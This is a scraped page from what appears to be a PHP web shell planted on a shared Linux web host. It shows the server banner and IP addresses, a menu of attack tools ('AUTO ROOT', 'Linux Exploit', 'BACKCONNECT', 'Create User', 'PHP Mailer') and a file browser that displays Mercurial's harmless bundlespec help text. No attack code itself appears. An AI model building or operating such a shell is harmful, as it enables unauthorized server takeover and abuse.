Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
mercurial /
helptext /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
internals
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
bundlespec.txt
2.64
KB
-rw-r--r--
color.txt
4.5
KB
-rw-r--r--
common.txt
240
B
-rw-r--r--
config.txt
116.16
KB
-rw-r--r--
dates.txt
1.25
KB
-rw-r--r--
deprecated.txt
678
B
-rw-r--r--
diffs.txt
1.33
KB
-rw-r--r--
environment.txt
4.28
KB
-rw-r--r--
evolution.txt
2.1
KB
-rw-r--r--
extensions.txt
1.22
KB
-rw-r--r--
filesets.txt
2.07
KB
-rw-r--r--
flags.txt
2.93
KB
-rw-r--r--
glossary.txt
14.86
KB
-rw-r--r--
hg-ssh.8.txt
1.81
KB
-rw-r--r--
hg.1.txt
3.13
KB
-rw-r--r--
hgignore.5.txt
723
B
-rw-r--r--
hgignore.txt
3.34
KB
-rw-r--r--
hgrc.5.txt
795
B
-rw-r--r--
hgweb.txt
3.29
KB
-rw-r--r--
merge-tools.txt
4.41
KB
-rw-r--r--
pager.txt
1.43
KB
-rw-r--r--
patterns.txt
3.73
KB
-rw-r--r--
phases.txt
2.97
KB
-rw-r--r--
revisions.txt
6.82
KB
-rw-r--r--
rust.txt
3.05
KB
-rw-r--r--
scripting.txt
7.99
KB
-rw-r--r--
subrepos.txt
7.21
KB
-rw-r--r--
templates.txt
5.83
KB
-rw-r--r--
urls.txt
2.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bundlespec.txt
Mercurial supports generating standalone "bundle" files that hold repository data. These "bundles" are typically saved locally and used later or exchanged between different repositories, possibly on different machines. Example commands using bundles are :hg:`bundle` and :hg:`unbundle`. Generation of bundle files is controlled by a "bundle specification" ("bundlespec") string. This string tells the bundle generation process how to create the bundle. A "bundlespec" string is composed of the following elements: type A string denoting the bundle format to use. compression Denotes the compression engine to use compressing the raw bundle data. parameters Arbitrary key-value parameters to further control bundle generation. A "bundlespec" string has the following formats: <type> The literal bundle format string is used. <compression>-<type> The compression engine and format are delimited by a hyphen (``-``). Optional parameters follow the ``<type>``. Parameters are URI escaped ``key=value`` pairs. Each pair is delimited by a semicolon (``;``). The first parameter begins after a ``;`` immediately following the ``<type>`` value. Available Types =============== The following bundle <type> strings are available: v1 Produces a legacy "changegroup" version 1 bundle. This format is compatible with nearly all Mercurial clients because it is the oldest. However, it has some limitations, which is why it is no longer the default for new repositories. ``v1`` bundles can be used with modern repositories using the "generaldelta" storage format. However, it may take longer to produce the bundle and the resulting bundle may be significantly larger than a ``v2`` bundle. ``v1`` bundles can only use the ``gzip``, ``bzip2``, and ``none`` compression formats. v2 Produces a version 2 bundle. Version 2 bundles are an extensible format that can store additional repository data (such as bookmarks and phases information) and they can store data more efficiently, resulting in smaller bundles. Version 2 bundles can also use modern compression engines, such as ``zstd``, making them faster to compress and often smaller. Available Compression Engines ============================= The following bundle <compression> engines can be used: .. bundlecompressionmarker Examples ======== ``v2`` Produce a ``v2`` bundle using default options, including compression. ``none-v1`` Produce a ``v1`` bundle with no compression. ``zstd-v2`` Produce a ``v2`` bundle with zstandard compression using default settings. ``zstd-v1`` This errors because ``zstd`` is not supported for ``v1`` types.
Close